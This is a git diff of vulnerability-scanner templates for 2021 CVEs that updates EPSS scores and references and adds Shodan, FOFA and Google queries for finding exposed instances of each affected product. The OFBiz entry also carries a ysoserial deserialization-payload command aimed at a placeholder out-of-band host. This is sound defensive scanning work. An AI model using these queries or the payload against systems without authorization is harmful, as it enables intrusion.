b/http/cves/2021/CVE-2021-26085.yaml index 9a2bfe2a98..d679522076 100644 --- a/http/cves/2021/CVE-2021-26085.yaml +++ b/http/cves/2021/CVE-2021-26085.yaml @@ -14,19 +14,21 @@ info: - https://jira.atlassian.com/browse/CONFSERVER-67893 - https://nvd.nist.gov/vuln/detail/CVE-2021-26085 - http://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html + - https://github.com/e-hakson/OSCP classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2021-26085 cwe-id: CWE-425 - epss-score: 0.96595 - epss-percentile: 0.99535 + epss-score: 0.95896 + epss-percentile: 0.9945 cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: atlassian product: confluence_data_center shodan-query: http.component:"Atlassian Confluence" + fofa-query: app="atlassian-confluence" tags: cve2021,cve,kev,packetstorm,confluence,atlassian,lfi,intrusive http: diff --git a/http/cves/2021/CVE-2021-26086.yaml b/http/cves/2021/CVE-2021-26086.yaml index ade22c35b2..f075b6d22c 100644 --- a/http/cves/2021/CVE-2021-26086.yaml +++ b/http/cves/2021/CVE-2021-26086.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5.3 cve-id: CVE-2021-26086 cwe-id: CWE-22 - epss-score: 0.54993 - epss-percentile: 0.97368 + epss-score: 0.91202 + epss-percentile: 0.98861 cpe: cpe:2.3:a:atlassian:jira_data_center:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-26247.yaml b/http/cves/2021/CVE-2021-26247.yaml index aed11f963e..5504605411 100644 --- a/http/cves/2021/CVE-2021-26247.yaml +++ b/http/cves/2021/CVE-2021-26247.yaml @@ -20,12 +20,15 @@ info: cve-id: CVE-2021-26247 cwe-id: CWE-79 epss-score: 0.00255 - epss-percentile: 0.647 + epss-percentile: 0.65308 cpe: cpe:2.3:a:cacti:cacti:0.8.7g:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cacti product: cacti + fofa-query: icon_hash="-1797138069" + shodan-query: http.title:"login to cacti" + google-query: intitle:"cacti" tags: cve,cve2021,cacti,xss http: diff --git a/http/cves/2021/CVE-2021-26294.yaml b/http/cves/2021/CVE-2021-26294.yaml index e67e96c9ce..c78b2cb21c 100644 --- a/http/cves/2021/CVE-2021-26294.yaml +++ b/http/cves/2021/CVE-2021-26294.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-26294 cwe-id: CWE-22 - epss-score: 0.25543 - epss-percentile: 0.96591 + epss-score: 0.21969 + epss-percentile: 0.96457 cpe: cpe:2.3:a:afterlogic:aurora:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-26295.yaml b/http/cves/2021/CVE-2021-26295.yaml index 05427b7d89..bfe98d7bc2 100644 --- a/http/cves/2021/CVE-2021-26295.yaml +++ b/http/cves/2021/CVE-2021-26295.yaml @@ -32,6 +32,7 @@ info: product: ofbiz shodan-query: "OFBiz.Visitor=" ysoserial-payload: java -jar ysoserial.jar URLDNS https://oob-url-to-request.tld | hex + fofa-query: body="ofbiz" tags: cve2021,cve,packetstorm,apache,ofbiz,deserialization,rce http: diff --git a/http/cves/2021/CVE-2021-26598.yaml b/http/cves/2021/CVE-2021-26598.yaml index 71c38b508a..7508d6e350 100644 --- a/http/cves/2021/CVE-2021-26598.yaml +++ b/http/cves/2021/CVE-2021-26598.yaml @@ -20,14 +20,15 @@ info: cvss-score: 5.3 cve-id: CVE-2021-26598 cwe-id: CWE-287 - epss-score: 0.00506 - epss-percentile: 0.74005 + epss-score: 0.03958 + epss-percentile: 0.92001 cpe: cpe:2.3:a:impresscms:impresscms:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: impresscms product: impresscms shodan-query: http.html:"ImpressCMS" + fofa-query: body="impresscms" tags: cve,cve2021,hackerone,impresscms,unauth,cms http: diff --git a/http/cves/2021/CVE-2021-26702.yaml b/http/cves/2021/CVE-2021-26702.yaml index 8e73cc509d..e1273b45ce 100644 --- a/http/cves/2021/CVE-2021-26702.yaml +++ b/http/cves/2021/CVE-2021-26702.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-26702 cwe-id: CWE-79 epss-score: 0.00187 - epss-percentile: 0.55045 + epss-percentile: 0.55848 cpe: cpe:2.3:a:eprints:eprints:3.4.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-26710.yaml b/http/cves/2021/CVE-2021-26710.yaml index 98dabf79f1..df0d84a9e6 100644 --- a/http/cves/2021/CVE-2021-26710.yaml +++ b/http/cves/2021/CVE-2021-26710.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-26710 cwe-id: CWE-79 - epss-score: 0.00114 - epss-percentile: 0.44746 + epss-score: 0.00116 + epss-percentile: 0.45321 cpe: cpe:2.3:a:redwood:report2web:4.3.4.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-26723.yaml b/http/cves/2021/CVE-2021-26723.yaml index 238d818436..d6a8460175 100644 --- a/http/cves/2021/CVE-2021-26723.yaml +++ b/http/cves/2021/CVE-2021-26723.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-26723 cwe-id: CWE-79 epss-score: 0.07461 - epss-percentile: 0.93477 + epss-percentile: 0.94099 cpe: cpe:2.3:a:jenzabar:jenzabar:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-26812.yaml b/http/cves/2021/CVE-2021-26812.yaml index 5cf22dd0d8..f3a73b8679 100644 --- a/http/cves/2021/CVE-2021-26812.yaml +++ b/http/cves/2021/CVE-2021-26812.yaml @@ -12,13 +12,15 @@ info: reference: - https://github.com/udima-university/moodle-mod_jitsi/issues/67 - https://nvd.nist.gov/vuln/detail/CVE-2021-26812 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-26812 cwe-id: CWE-79 epss-score: 0.00464 - epss-percentile: 0.72797 + epss-percentile: 0.75413 cpe: cpe:2.3:a:jitsi:meet:*:*:*:*:*:moodle:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-26855.yaml b/http/cves/2021/CVE-2021-26855.yaml index 3da3c8b5ab..69ea7ecfe0 100644 --- a/http/cves/2021/CVE-2021-26855.yaml +++ b/http/cves/2021/CVE-2021-26855.yaml @@ -27,6 +27,8 @@ info: vendor: microsoft product: exchange_server shodan-query: vuln:CVE-2021-26855 + fofa-query: title="outlook" + google-query: intitle:"outlook" tags: cve2021,cve,ssrf,rce,exchange,oast,microsoft,kev http: diff --git a/http/cves/2021/CVE-2021-27124.yaml b/http/cves/2021/CVE-2021-27124.yaml index 3818af28ba..e9034cf85f 100644 --- a/http/cves/2021/CVE-2021-27124.yaml +++ b/http/cves/2021/CVE-2021-27124.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.5 cve-id: CVE-2021-27124 cwe-id: CWE-89 - epss-score: 0.01251 - epss-percentile: 0.85241 + epss-score: 0.01991 + epss-percentile: 0.88786 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-27309.yaml b/http/cves/2021/CVE-2021-27309.yaml index f8a8753b88..580f90c681 100644 --- a/http/cves/2021/CVE-2021-27309.yaml +++ b/http/cves/2021/CVE-2021-27309.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-27309 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42925 + epss-percentile: 0.43249 cpe: cpe:2.3:a:csphere:clansphere:2011.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-27315.yaml b/http/cves/2021/CVE-2021-27315.yaml index 257541a2b4..aaa515527c 100644 --- a/http/cves/2021/CVE-2021-27315.yaml +++ b/http/cves/2021/CVE-2021-27315.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-27315 cwe-id: CWE-89 - epss-score: 0.06768 - epss-percentile: 0.93718 + epss-score: 0.07849 + epss-percentile: 0.94222 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-27319.yaml b/http/cves/2021/CVE-2021-27319.yaml index 79a39b0365..943ccdb933 100644 --- a/http/cves/2021/CVE-2021-27319.yaml +++ b/http/cves/2021/CVE-2021-27319.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-27319 cwe-id: CWE-89 - epss-score: 0.08052 - epss-percentile: 0.9371 + epss-score: 0.07849 + epss-percentile: 0.94222 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-27320.yaml b/http/cves/2021/CVE-2021-27320.yaml index 260320a154..bf34d7d00f 100644 --- a/http/cves/2021/CVE-2021-27320.yaml +++ b/http/cves/2021/CVE-2021-27320.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-27320 cwe-id: CWE-89 - epss-score: 0.09267 - epss-percentile: 0.94102 + epss-score: 0.10551 + epss-percentile: 0.95011 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-27330.yaml b/http/cves/2021/CVE-2021-27330.yaml index 4053b5d34e..7ad3ed0325 100644 --- a/http/cves/2021/CVE-2021-27330.yaml +++ b/http/cves/2021/CVE-2021-27330.yaml @@ -30,6 +30,8 @@ info: vendor: triconsole product: datepicker_calendar google-query: intitle:TriConsole.com - PHP Calendar Date Picker + shodan-query: http.title:triconsole.com - php calendar date picker + fofa-query: title=triconsole.com - php calendar date picker tags: cve2021,cve,xss,edb,triconsole http: diff --git a/http/cves/2021/CVE-2021-27358.yaml b/http/cves/2021/CVE-2021-27358.yaml index 58de74b0b0..ee1176c56c 100644 --- a/http/cves/2021/CVE-2021-27358.yaml +++ b/http/cves/2021/CVE-2021-27358.yaml @@ -28,6 +28,8 @@ info: vendor: grafana product: grafana shodan-query: title:"Grafana" + fofa-query: title="grafana" + google-query: intitle:"grafana" tags: cve2021,cve,grafana,unauth http: diff --git a/http/cves/2021/CVE-2021-27519.yaml b/http/cves/2021/CVE-2021-27519.yaml index 459b0599d6..c59651b4f6 100644 --- a/http/cves/2021/CVE-2021-27519.yaml +++ b/http/cves/2021/CVE-2021-27519.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-27519 cwe-id: CWE-79 epss-score: 0.00217 - epss-percentile: 0.59015 + epss-percentile: 0.59671 cpe: cpe:2.3:a:fudforum:fudforum:3.1.0:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: fudforum product: fudforum shodan-query: 'http.html:"Powered by: FUDforum"' + fofa-query: 'body="powered by: fudforum"' tags: cve2021,cve,xss,fudforum,edb,packetstorm http: diff --git a/http/cves/2021/CVE-2021-27520.yaml b/http/cves/2021/CVE-2021-27520.yaml index 4554d3323b..b3819d8e07 100644 --- a/http/cves/2021/CVE-2021-27520.yaml +++ b/http/cves/2021/CVE-2021-27520.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-27520 cwe-id: CWE-79 epss-score: 0.00217 - epss-percentile: 0.59015 + epss-percentile: 0.59671 cpe: cpe:2.3:a:fudforum:fudforum:3.1.0:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: fudforum product: fudforum shodan-query: html:"FUDforum" + fofa-query: 'body="powered by: fudforum"' tags: cve2021,cve,packetstorm,xss,fuddorum,edb,intrusive,fudforum http: diff --git a/http/cves/2021/CVE-2021-27561.yaml b/http/cves/2021/CVE-2021-27561.yaml index 92a0464ee2..445e72d342 100644 --- a/http/cves/2021/CVE-2021-27561.yaml +++ b/http/cves/2021/CVE-2021-27561.yaml @@ -13,13 +13,15 @@ info: - https://ssd-disclosure.com/ssd-advisory-yealink-dm-pre-auth-root-level-rce/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-27561 - https://ssd-disclosure.com/?p=4688 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-27561 cwe-id: CWE-78 - epss-score: 0.97434 - epss-percentile: 0.99939 + epss-score: 0.97435 + epss-percentile: 0.99942 cpe: cpe:2.3:a:yealink:device_management:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-27651.yaml b/http/cves/2021/CVE-2021-27651.yaml index ffc078701e..fb6b0b26d1 100644 --- a/http/cves/2021/CVE-2021-27651.yaml +++ b/http/cves/2021/CVE-2021-27651.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-27651 cwe-id: CWE-287 - epss-score: 0.07705 - epss-percentile: 0.94021 + epss-score: 0.06797 + epss-percentile: 0.93865 cpe: cpe:2.3:a:pega:infinity:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-27670.yaml b/http/cves/2021/CVE-2021-27670.yaml index 36f6eed5f7..a407f4f20d 100644 --- a/http/cves/2021/CVE-2021-27670.yaml +++ b/http/cves/2021/CVE-2021-27670.yaml @@ -29,6 +29,8 @@ info: vendor: appspace product: appspace shodan-query: title:"Appspace" + fofa-query: title="appspace" + google-query: intitle:"appspace" tags: cve,cve2021,appspace,ssrf http: diff --git a/http/cves/2021/CVE-2021-27850.yaml b/http/cves/2021/CVE-2021-27850.yaml index e174da05da..a52441a726 100644 --- a/http/cves/2021/CVE-2021-27850.yaml +++ b/http/cves/2021/CVE-2021-27850.yaml @@ -15,12 +15,13 @@ info: - https://lists.apache.org/thread.html/r237ff7f286bda31682c254550c1ebf92b0ec61329b32fbeb2d1c8751%40%3Cusers.tapestry.apache.org%3E - http://www.openwall.com/lists/oss-security/2021/04/15/1 - https://security.netapp.com/advisory/ntap-20210528-0002/ + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-27850 cwe-id: CWE-502,CWE-200 - epss-score: 0.97388 + epss-score: 0.9737 epss-percentile: 0.99903 cpe: cpe:2.3:a:apache:tapestry:*:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2021/CVE-2021-27905.yaml b/http/cves/2021/CVE-2021-27905.yaml index ad2247e6cc..81332d6f7a 100644 --- a/http/cves/2021/CVE-2021-27905.yaml +++ b/http/cves/2021/CVE-2021-27905.yaml @@ -26,6 +26,9 @@ info: max-request: 2 vendor: apache product: solr + shodan-query: cpe:"cpe:2.3:a:apache:solr" + fofa-query: title="solr admin" + google-query: intitle:"apache solr" tags: cve2021,cve,apache,solr,ssrf http: diff --git a/http/cves/2021/CVE-2021-27909.yaml b/http/cves/2021/CVE-2021-27909.yaml index 9d8da927e5..5d3ffad92e 100644 --- a/http/cves/2021/CVE-2021-27909.yaml +++ b/http/cves/2021/CVE-2021-27909.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-27909 cwe-id: CWE-79 - epss-score: 0.00094 - epss-percentile: 0.3927 + epss-score: 0.00101 + epss-percentile: 0.41606 cpe: cpe:2.3:a:acquia:mautic:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,8 @@ info: vendor: acquia product: mautic shodan-query: title:"Mautic" + fofa-query: title="mautic" + google-query: intitle:"mautic" tags: cve2021,cve,mautic,xss,acquia http: diff --git a/http/cves/2021/CVE-2021-27931.yaml b/http/cves/2021/CVE-2021-27931.yaml index a24916763a..b408a5d4aa 100644 --- a/http/cves/2021/CVE-2021-27931.yaml +++ b/http/cves/2021/CVE-2021-27931.yaml @@ -12,13 +12,15 @@ info: reference: - https://github.com/sl4cky/LumisXP-XXE---POC/blob/main/poc.txt - https://nvd.nist.gov/vuln/detail/CVE-2021-27931 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H cvss-score: 9.1 cve-id: CVE-2021-27931 cwe-id: CWE-611 - epss-score: 0.4974 - epss-percentile: 0.97222 + epss-score: 0.60102 + epss-percentile: 0.97771 cpe: cpe:2.3:a:lumis:lumis_experience_platform:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-28150.yaml b/http/cves/2021/CVE-2021-28150.yaml index f2a6bb2e35..1a04e7cb59 100644 --- a/http/cves/2021/CVE-2021-28150.yaml +++ b/http/cves/2021/CVE-2021-28150.yaml @@ -13,13 +13,15 @@ info: - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - http://en.hongdian.com/Products/Details/H8922 - https://nvd.nist.gov/vuln/detail/CVE-2021-28150 + - https://github.com/SexyBeast233/SecBooks + - https://github.com/Threekiii/Awesome-POC classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 5.5 cve-id: CVE-2021-28150 cwe-id: CWE-425 epss-score: 0.00253 - epss-percentile: 0.63106 + epss-percentile: 0.6512 cpe: cpe:2.3:o:hongdian:h8922_firmware:3.0.5:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-28164.yaml b/http/cves/2021/CVE-2021-28164.yaml index 5eb0b5cd04..e60e497167 100644 --- a/http/cves/2021/CVE-2021-28164.yaml +++ b/http/cves/2021/CVE-2021-28164.yaml @@ -21,13 +21,14 @@ info: cvss-score: 5.3 cve-id: CVE-2021-28164 cwe-id: CWE-200,NVD-CWE-Other - epss-score: 0.04805 - epss-percentile: 0.9254 + epss-score: 0.04765 + epss-percentile: 0.92672 cpe: cpe:2.3:a:eclipse:jetty:9.4.37:20210219:*:*:*:*:*:* metadata: max-request: 2 vendor: eclipse product: jetty + shodan-query: cpe:"cpe:2.3:a:eclipse:jetty" tags: cve2021,cve,packetstorm,vulhub,jetty,exposure,eclipse flow: http(1) && http(2) diff --git a/http/cves/2021/CVE-2021-28169.yaml b/http/cves/2021/CVE-2021-28169.yaml index 3ccf2f9491..09e96598cf 100644 --- a/http/cves/2021/CVE-2021-28169.yaml +++ b/http/cves/2021/CVE-2021-28169.yaml @@ -21,13 +21,14 @@ info: cvss-score: 5.3 cve-id: CVE-2021-28169 cwe-id: CWE-200,NVD-CWE-Other - epss-score: 0.00401 - epss-percentile: 0.70865 + epss-score: 0.00618 + epss-percentile: 0.78767 cpe: cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: eclipse product: jetty + shodan-query: cpe:"cpe:2.3:a:eclipse:jetty" tags: cve2021,cve,jetty,eclipse http: diff --git a/http/cves/2021/CVE-2021-28377.yaml b/http/cves/2021/CVE-2021-28377.yaml index 1959824f21..8172d8b0d2 100644 --- a/http/cves/2021/CVE-2021-28377.yaml +++ b/http/cves/2021/CVE-2021-28377.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-28377 cwe-id: CWE-22 epss-score: 0.00106 - epss-percentile: 0.42913 + epss-percentile: 0.43237 cpe: cpe:2.3:a:chronoengine:chronoforums:2.0.11:*:*:*:*:joomla:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-28419.yaml b/http/cves/2021/CVE-2021-28419.yaml index 7ff682344f..da5eb9f715 100644 --- a/http/cves/2021/CVE-2021-28419.yaml +++ b/http/cves/2021/CVE-2021-28419.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.2 cve-id: CVE-2021-28419 cwe-id: CWE-89 - epss-score: 0.17236 - epss-percentile: 0.95637 + epss-score: 0.15235 + epss-percentile: 0.95839 cpe: cpe:2.3:a:seopanel:seo_panel:4.8.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-28937.yaml b/http/cves/2021/CVE-2021-28937.yaml index c6825729e2..ee497a4678 100644 --- a/http/cves/2021/CVE-2021-28937.yaml +++ b/http/cves/2021/CVE-2021-28937.yaml @@ -13,18 +13,20 @@ info: - https://blog-ssh3ll.medium.com/acexy-wireless-n-wifi-repeater-vulnerabilities-8bd5d14a2990 - http://acexy.com - https://nvd.nist.gov/vuln/detail/CVE-2021-28937 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-28937 cwe-id: CWE-312 - epss-score: 0.02476 - epss-percentile: 0.88958 - cpe: cpe:2.3:o:acexy:wireless-n_wifi_repeater_firmware:28.08.06.1:*:*:*:*:*:*:* + epss-score: 0.03261 + epss-percentile: 0.91257 + cpe: cpe:2.3:h:acexy:wireless-n_wifi_repeater:1.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: acexy - product: wireless-n_wifi_repeater_firmware + product: wireless-n_wifi_repeater tags: cve2021,cve,acexy,disclosure,iot http: diff --git a/http/cves/2021/CVE-2021-29006.yaml b/http/cves/2021/CVE-2021-29006.yaml index dee3572992..8222f07071 100644 --- a/http/cves/2021/CVE-2021-29006.yaml +++ b/http/cves/2021/CVE-2021-29006.yaml @@ -24,6 +24,8 @@ info: vendor: rconfig product: rconfig shodan-query: http.title:"rConfig" + fofa-query: title="rconfig" + google-query: intitle:"rconfig" tags: cve2021,cve,rconfig,authenticated,lfi http: diff --git a/http/cves/2021/CVE-2021-29156.yaml b/http/cves/2021/CVE-2021-29156.yaml index 381fbbf5d6..ff16725ea6 100644 --- a/http/cves/2021/CVE-2021-29156.yaml +++ b/http/cves/2021/CVE-2021-29156.yaml @@ -19,14 +19,16 @@ info: cvss-score: 7.5 cve-id: CVE-2021-29156 cwe-id: CWE-74 - epss-score: 0.30859 - epss-percentile: 0.96857 + epss-score: 0.29536 + epss-percentile: 0.96913 cpe: cpe:2.3:a:forgerock:openam:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: forgerock product: openam shodan-query: http.title:"OpenAM" + fofa-query: title="openam" + google-query: intitle:"openam" tags: cve2021,cve,openam,ldap,injection,forgerock http: diff --git a/http/cves/2021/CVE-2021-29200.yaml b/http/cves/2021/CVE-2021-29200.yaml index 3c02de645f..0ce1ba2632 100644 --- a/http/cves/2021/CVE-2021-29200.yaml +++ b/http/cves/2021/CVE-2021-29200.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-29200 cwe-id: CWE-502 - epss-score: 0.90403 - epss-percentile: 0.98567 + epss-score: 0.85578 + epss-percentile: 0.9855 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-29203.yaml b/http/cves/2021/CVE-2021-29203.yaml index b18961aec3..06e5f885b0 100644 --- a/http/cves/2021/CVE-2021-29203.yaml +++ b/http/cves/2021/CVE-2021-29203.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-29203 cwe-id: CWE-306 - epss-score: 0.95519 - epss-percentile: 0.99258 + epss-score: 0.95563 + epss-percentile: 0.99393 cpe: cpe:2.3:a:hp:edgeline_infrastructure_manager:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-29442.yaml b/http/cves/2021/CVE-2021-29442.yaml index a1e8009c16..42e5b76170 100644 --- a/http/cves/2021/CVE-2021-29442.yaml +++ b/http/cves/2021/CVE-2021-29442.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-29442 cwe-id: CWE-306 - epss-score: 0.9676 - epss-percentile: 0.99596 + epss-score: 0.96724 + epss-percentile: 0.99657 cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-29484.yaml b/http/cves/2021/CVE-2021-29484.yaml index 31fdd85c80..78ac537567 100644 --- a/http/cves/2021/CVE-2021-29484.yaml +++ b/http/cves/2021/CVE-2021-29484.yaml @@ -27,6 +27,7 @@ info: vendor: ghost product: ghost framework: node.js + shodan-query: http.component:"ghost" tags: cve2021,cve,xss,ghost,node.js http: diff --git a/http/cves/2021/CVE-2021-29490.yaml b/http/cves/2021/CVE-2021-29490.yaml index a5de338f9d..e47de0ddcf 100644 --- a/http/cves/2021/CVE-2021-29490.yaml +++ b/http/cves/2021/CVE-2021-29490.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-29490 cwe-id: CWE-918 epss-score: 0.00159 - epss-percentile: 0.51433 + epss-percentile: 0.52336 cpe: cpe:2.3:a:jellyfin:jellyfin:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,8 @@ info: vendor: jellyfin product: jellyfin shodan-query: http.title:"Jellyfin" + fofa-query: body="jellyfin" + google-query: intitle:"jellyfin" tags: cve,cve2021,ssrf,jellyfin,oast http: diff --git a/http/cves/2021/CVE-2021-29622.yaml b/http/cves/2021/CVE-2021-29622.yaml index 97e6c6a595..a49b3e4c07 100644 --- a/http/cves/2021/CVE-2021-29622.yaml +++ b/http/cves/2021/CVE-2021-29622.yaml @@ -13,13 +13,14 @@ info: - https://github.com/prometheus/prometheus/releases/tag/v2.26.1 - https://github.com/prometheus/prometheus/releases/tag/v2.27.1 - https://nvd.nist.gov/vuln/detail/CVE-2021-29622 + - https://github.com/d4n-sec/d4n-sec.github.io classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-29622 cwe-id: CWE-601 - epss-score: 0.00269 - epss-percentile: 0.64358 + epss-score: 0.00287 + epss-percentile: 0.68762 cpe: cpe:2.3:a:prometheus:prometheus:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-29625.yaml b/http/cves/2021/CVE-2021-29625.yaml index 1f9d7e12c6..4f9477742d 100644 --- a/http/cves/2021/CVE-2021-29625.yaml +++ b/http/cves/2021/CVE-2021-29625.yaml @@ -26,6 +26,10 @@ info: max-request: 1 vendor: adminer product: adminer + shodan-query: http.title:"login - adminer" + fofa-query: app="adminer" && body="4.7.8" + hunter-query: app.name="adminer"&&web.body="4.7.8" + google-query: intitle:"login - adminer" tags: cve2021,cve,adminer,xss http: diff --git a/http/cves/2021/CVE-2021-3002.yaml b/http/cves/2021/CVE-2021-3002.yaml index 0be734c0ee..a4285656cd 100644 --- a/http/cves/2021/CVE-2021-3002.yaml +++ b/http/cves/2021/CVE-2021-3002.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-3002 cwe-id: CWE-79 epss-score: 0.00143 - epss-percentile: 0.49273 + epss-percentile: 0.50121 cpe: cpe:2.3:a:seopanel:seo_panel:4.8.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-30049.yaml b/http/cves/2021/CVE-2021-30049.yaml index 8e5102506d..b45286451f 100644 --- a/http/cves/2021/CVE-2021-30049.yaml +++ b/http/cves/2021/CVE-2021-30049.yaml @@ -19,13 +19,15 @@ info: cvss-score: 6.1 cve-id: CVE-2021-30049 cwe-id: CWE-79 - epss-score: 0.00106 - epss-percentile: 0.42156 + epss-score: 0.00113 + epss-percentile: 0.44743 cpe: cpe:2.3:a:sysaid:sysaid:20.3.64:b14:*:*:*:*:*:* metadata: max-request: 1 vendor: sysaid product: sysaid + shodan-query: http.favicon.hash:1540720428 + fofa-query: icon_hash=1540720428 tags: cve2021,cve,xss,sysaid http: diff --git a/http/cves/2021/CVE-2021-30128.yaml b/http/cves/2021/CVE-2021-30128.yaml index 0b586a7349..5c6d5420f0 100644 --- a/http/cves/2021/CVE-2021-30128.yaml +++ b/http/cves/2021/CVE-2021-30128.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-30128 cwe-id: CWE-502 - epss-score: 0.62199 - epss-percentile: 0.97748 + epss-score: 0.59411 + epss-percentile: 0.97756 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,7 @@ info: vendor: apache product: ofbiz fofa-query: app="Apache_OFBiz" + shodan-query: http.html:"ofbiz" tags: cve2021,cve,apache,ofbiz,deserialization,rce http: diff --git a/http/cves/2021/CVE-2021-30134.yaml b/http/cves/2021/CVE-2021-30134.yaml index 73e42c7040..53bf9ec457 100644 --- a/http/cves/2021/CVE-2021-30134.yaml +++ b/http/cves/2021/CVE-2021-30134.yaml @@ -13,13 +13,14 @@ info: reference: - https://wpscan.com/vulnerability/0b547728-27d2-402e-ae17-90d539344ec7 - https://nvd.nist.gov/vuln/detail/CVE-2021-30134 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-30134 cwe-id: CWE-79 - epss-score: 0.00097 - epss-percentile: 0.40139 + 